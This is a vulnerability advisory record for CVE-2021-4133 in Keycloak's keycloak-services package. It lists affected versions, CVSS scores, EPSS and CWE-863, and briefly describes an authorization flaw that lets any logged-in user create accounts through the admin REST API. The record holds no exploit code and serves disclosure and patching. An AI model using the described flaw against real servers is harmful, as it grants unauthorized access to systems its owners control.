CVE-2021-4133 – org.keycloak:keycloak-services

Package

Manager: maven
Name: org.keycloak:keycloak-services
Vulnerable Version: >=0 <15.1.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00263 pctl0.49493

Details

Improper Authorization in Keycloak A incorrect authorization flaw was found in Keycloak 12.0.0, the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled.

Metadata

Created: 2022-01-06T18:32:58Z
Modified: 2022-02-02T16:07:18Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-83x4-9cwr-5487/GHSA-83x4-9cwr-5487.json
CWE IDs: ["CWE-863"]
Alternative ID: GHSA-83x4-9cwr-5487
Finding: F006
Auto approve: 1